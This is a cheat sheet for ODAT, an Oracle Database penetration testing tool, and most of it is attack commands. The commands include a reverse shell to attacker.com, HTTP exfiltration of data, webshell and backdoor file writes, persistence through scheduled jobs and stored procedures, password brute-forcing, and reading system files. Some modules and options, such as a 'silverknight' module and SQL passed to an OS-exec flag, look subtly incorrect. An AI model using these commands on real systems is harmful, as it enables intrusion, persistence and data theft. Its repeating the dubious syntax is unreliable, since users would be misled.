ODAT
Overview
섹션 제목: “Overview”ODAT (Oracle Database Attacking Tool) is a Python-based penetration testing toolkit specifically designed for Oracle Database security testing. It identifies misconfigurations, weak credentials, and exploitable vulnerabilities in Oracle Database instances. ODAT can perform reconnaissance, credential testing, privilege escalation, and code execution on vulnerable Oracle systems.
The tool combines multiple attack vectors including SQL injection, default credential testing, privilege escalation, and direct database access exploitation. It’s essential for database security professionals conducting authorized assessments of Oracle infrastructure.
Installation
섹션 제목: “Installation”Requirements
섹션 제목: “Requirements”# Python 3.x
python3 --version
# pip for package management
pip3 --version
# Oracle client libraries (optional but recommended)
# Install libaio1 on Linux
sudo apt-get install libaio1 libaio-devInstallation via Git
섹션 제목: “Installation via Git”# Clone the repository
git clone https://github.com/quentinhardy/odat.git
cd odat
# Install dependencies
pip3 install -r requirements.txt
# Make executable
chmod +x odat.py
# Test installation
python3 odat.py --helpInstallation from PyPI
섹션 제목: “Installation from PyPI”# Install via pip
pip3 install odat
# Verify
odat --helpDocker Installation
섹션 제목: “Docker Installation”# Build Docker image
docker build -t odat .
# Run in Docker
docker run -it odat --helpBasic Syntax
섹션 제목: “Basic Syntax”python3 odat.py [module] [options]
odat [module] [options]Core Modules
섹션 제목: “Core Modules”| Module | Description | Purpose |
|---|---|---|
all | Run all modules | Complete assessment |
tnslsnr | TNS Listener reconnaissance | Enumerate services |
listener | Listener enumeration | Service discovery |
tnspoison | TNS poisoning | MITM attack vector |
credentialstest | Test default credentials | Quick credential check |
utlfile | UTL_FILE privilege check | File read/write testing |
utlhttp | UTL_HTTP testing | HTTP request capability |
httpserver | HTTP server module | Web interface access |
externaltable | External table creation | Data access method |
dbmsxmlquery | DBMS_XMLQUERY testing | XML query execution |
dbmsscheduler | DBMS_SCHEDULER testing | Scheduled job creation |
java | Java execution testing | Code execution path |
oraexec | Operating system command execution | Shell command access |
ctxsys | CTXSYS module testing | Context privileges |
mdsys | MDSYS module testing | Spatial features |
silverknight | SilverKnight password audit | Password strength check |
passwords | Password dictionary testing | Credential brute-force |
Essential Commands
섹션 제목: “Essential Commands”| Command | Description |
|---|---|
-h, --help | Display help message |
-v | Verbose output |
-vv | Very verbose output |
--version | Show version |
-t, --target | Target host or IP address |
-p, --port | Target database port (default: 1521) |
-d, --database | Database name (SID) |
-U, --user | Username for authentication |
-P, --password | Password for authentication |
--accounts-file | File with account credentials |
--passwords-file | Wordlist for password testing |
-m, --module | Specific module to run |
--all | Run all applicable modules |
-x | Exploit/attack mode |
--output | Output file for results |
TNS Listener Enumeration
섹션 제목: “TNS Listener Enumeration”Listener Discovery
섹션 제목: “Listener Discovery”# Enumerate TNS listeners
python3 odat.py tnslsnr -t 192.168.1.100 -vv
# Output includes:
# - Version information
# - Service names
# - Instance details
# - Listener statusService Enumeration
섹션 제목: “Service Enumeration”# Get detailed service information
python3 odat.py listener -t 192.168.1.100 -p 1521
# Lists:
# - Available database instances
# - Service names (SIDs)
# - Network aliasesCheck Listener Version
섹션 제목: “Check Listener Version”# Specific listener information
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv
# Useful for identifying vulnerable versionsCredential Testing
섹션 제목: “Credential Testing”Default Credentials
섹션 제목: “Default Credentials”# Test common Oracle default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL -U sys -P change_on_install
# Common accounts:
# - sys / change_on_install
# - system / manager
# - scott / tiger
# - dbsnmp / dbsnmp
# - sysman / sysmanCredential Testing from Wordlist
섹션 제목: “Credential Testing from Wordlist”# Test credentials from file
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
--accounts-file accounts.txt
# accounts.txt format:
# username:password
# sys:change_on_install
# system:managerBrute-Force Testing
섹션 제목: “Brute-Force Testing”# Test password list against known users
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 -d ORCL \
-U system --passwords-file passwords.txt
# Test multiple users with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
--users-file users.txt --passwords-file passwords.txtPrivilege Escalation
섹션 제목: “Privilege Escalation”Direct Privilege Escalation
섹션 제목: “Direct Privilege Escalation”# Escalate from limited user to admin
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --sysdba
# Gain SYSDBA privileges
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password -xVulnerable Packages Exploitation
섹션 제목: “Vulnerable Packages Exploitation”# Exploit vulnerable Oracle packages
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -x
# CTXSYS privilege escalation
python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -x
# MDSYS exploitation
python3 odat.py mdsys -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -xFile System Access
섹션 제목: “File System Access”Read Files via UTL_FILE
섹션 제목: “Read Files via UTL_FILE”# Read local files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --read /etc/passwd
# Read Oracle files
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --read /u01/app/oracle/alert/alert_ORCL.logWrite Files via UTL_FILE
섹션 제목: “Write Files via UTL_FILE”# Write files to server
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --write /tmp/backdoor.sh
# Create webshell
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --write /var/www/html/shell.jspCreate External Tables
섹션 제목: “Create External Tables”# Create external table for file access
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --read /etc/passwd
# Extract data from server
python3 odat.py externaltable -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --read /u01/app/oracle/oradata/ORCL/system01.dbfCode Execution
섹션 제목: “Code Execution”Execute Operating System Commands
섹션 제목: “Execute Operating System Commands”# Direct OS command execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --exec "whoami"
# Execute commands via Java
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --exec "id"
# Create reverse shell
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --exec "bash -i >& /dev/tcp/attacker.com/4444 0>&1"Scheduled Job Execution
섹션 제목: “Scheduled Job Execution”# Use DBMS_SCHEDULER for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --create-job "myjob" --exec "whoami"
# Execute at specific time
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --create-job "myjob" --schedule "FREQ=DAILY;BYHOUR=2"HTTP Communication
섹션 제목: “HTTP Communication”HTTP Server Access
섹션 제목: “HTTP Server Access”# Check HTTP server capabilities
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --geturl "http://attacker.com/file"
# Upload files via HTTP
python3 odat.py httpserver -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --putfile "shell.jsp" "attacker.com"UTL_HTTP Exploitation
섹션 제목: “UTL_HTTP Exploitation”# Make HTTP requests from database
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --request "GET http://attacker.com/data"
# Data exfiltration via HTTP
python3 odat.py utlhttp -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --request "POST http://attacker.com/exfil"Network Attacks
섹션 제목: “Network Attacks”TNS Listener Poisoning
섹션 제목: “TNS Listener Poisoning”# Poison TNS responses for MITM attack
python3 odat.py tnspoison -t 192.168.1.100 -vv
# Intercept and modify connections
# Require network access on same segmentComprehensive Assessment
섹션 제목: “Comprehensive Assessment”Full Database Audit
섹션 제목: “Full Database Audit”# Run all assessment modules
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -vv
# Includes:
# - Service enumeration
# - Credential testing
# - Privilege escalation checks
# - File access verification
# - Code execution pathsMulti-Database Assessment
섹션 제목: “Multi-Database Assessment”# Test against multiple databases
for db in DB1 DB2 DB3; do
python3 odat.py all -t 192.168.1.100 -p 1521 -d $db \
-U scott -P tiger -vv --output "$db-audit.txt"
doneVulnerability Assessment
섹션 제목: “Vulnerability Assessment”# Check for known vulnerabilities
python3 odat.py all -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password -vv 2>&1 | grep -i "vulnerable\|exploit\|vulnerability"Advanced Exploitation
섹션 제목: “Advanced Exploitation”Chaining Multiple Exploits
섹션 제목: “Chaining Multiple Exploits”#!/bin/bash
# 1. Identify valid credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
-d ORCL --accounts-file accounts.txt > valid_creds.txt
# 2. Test for privilege escalation
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -vv > priv_esc.txt
# 3. Execute commands if possible
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --exec "cat /etc/hostname"Persistence Mechanisms
섹션 제목: “Persistence Mechanisms”# Create scheduled job for persistence
python3 odat.py dbmsscheduler -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --create-job "backdoor" \
--exec "bash /tmp/persistence.sh" \
--schedule "FREQ=HOURLY"
# Create stored procedure backdoor
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --exec "CREATE OR REPLACE PROCEDURE backdoor AS BEGIN EXECUTE IMMEDIATE 'whoami'; END;"Data Exfiltration
섹션 제목: “Data Exfiltration”# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --read /u01/app/oracle/oradata/
# Query database and exfiltrate
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --exec \
"SELECT * FROM sys.user\$ WHERE TYPE#=1" > users.txtPassword Auditing
섹션 제목: “Password Auditing”SilverKnight Password Check
섹션 제목: “SilverKnight Password Check”# Audit password strength
python3 odat.py silverknight -t 192.168.1.100 -p 1521 -d ORCL \
-U sys -P change_on_install
# Identifies:
# - Weak passwords
# - Default credentials
# - Dictionary words
# - Common patternsPassword Dictionary Attack
섹션 제목: “Password Dictionary Attack”# Brute-force with wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
--users-file users.txt --passwords-file /usr/share/wordlists/rockyou.txt
# Custom wordlist
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
--users-file users.txt --passwords-file custom-passwords.txtReal-World Assessment Workflow
섹션 제목: “Real-World Assessment Workflow”Phase 1: Reconnaissance
섹션 제목: “Phase 1: Reconnaissance”# Identify Oracle services
python3 odat.py tnslsnr -t 192.168.1.100 -vv
# Enumerate instances
python3 odat.py listener -t 192.168.1.100 -p 1521 -vvPhase 2: Credential Testing
섹션 제목: “Phase 2: Credential Testing”# Test default credentials
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
-d ORCL --accounts-file default-accounts.txt
# Brute-force weak passwords
python3 odat.py passwords -t 192.168.1.100 -p 1521 -d ORCL \
-U system --passwords-file passwords.txtPhase 3: Privilege Escalation
섹션 제목: “Phase 3: Privilege Escalation”# Check for privilege escalation vectors
python3 odat.py java -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -vv
python3 odat.py ctxsys -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger -vvPhase 4: Exploitation
섹션 제목: “Phase 4: Exploitation”# Attempt code execution
python3 odat.py oraexec -t 192.168.1.100 -p 1521 -d ORCL \
-U system -P password --exec "whoami"
# Extract sensitive data
python3 odat.py utlfile -t 192.168.1.100 -p 1521 -d ORCL \
-U scott -P tiger --read /etc/passwdTroubleshooting
섹션 제목: “Troubleshooting”Connection Issues
섹션 제목: “Connection Issues”# Test connectivity
python3 odat.py tnslsnr -t 192.168.1.100 -p 1521 -vv
# Check firewall
telnet 192.168.1.100 1521
# Verify database name (SID)
tnsping ORCLAuthentication Failures
섹션 제목: “Authentication Failures”# Verify credentials
sqlplus scott/tiger@192.168.1.100:1521/ORCL
# Check user privileges
python3 odat.py credentialstest -t 192.168.1.100 -p 1521 \
-d ORCL -U scott -P tiger -vvModule Execution Errors
섹션 제목: “Module Execution Errors”# Enable verbose output
python3 odat.py <module> -t <target> -vv
# Check Python version
python3 --version
# Verify dependencies
pip3 list | grep cx_OracleSecurity Considerations
섹션 제목: “Security Considerations”- Obtain written authorization before testing
- Use ODAT in controlled lab environments only
- Minimize impact on production systems
- Document all activities and findings
- Use appropriate network isolation
- Maintain confidentiality of assessment results
- Follow organizational security policies
- Implement proper logging and monitoring
Related Tools
섹션 제목: “Related Tools”- sqlplus - Oracle command-line client
- SQLMap - SQL injection testing tool
- Metasploit - General penetration testing framework
- Burp Suite - Web application testing (for web-based access)
- tnsping - Oracle TNS connectivity tool
- nmap - Network discovery and scanning
References
섹션 제목: “References”- ODAT GitHub: https://github.com/quentinhardy/odat
- Oracle Database documentation
- OWASP Database Security
- CVE Oracle Database vulnerabilities
- Authorized penetration testing methodologies
- Responsible disclosure guidelines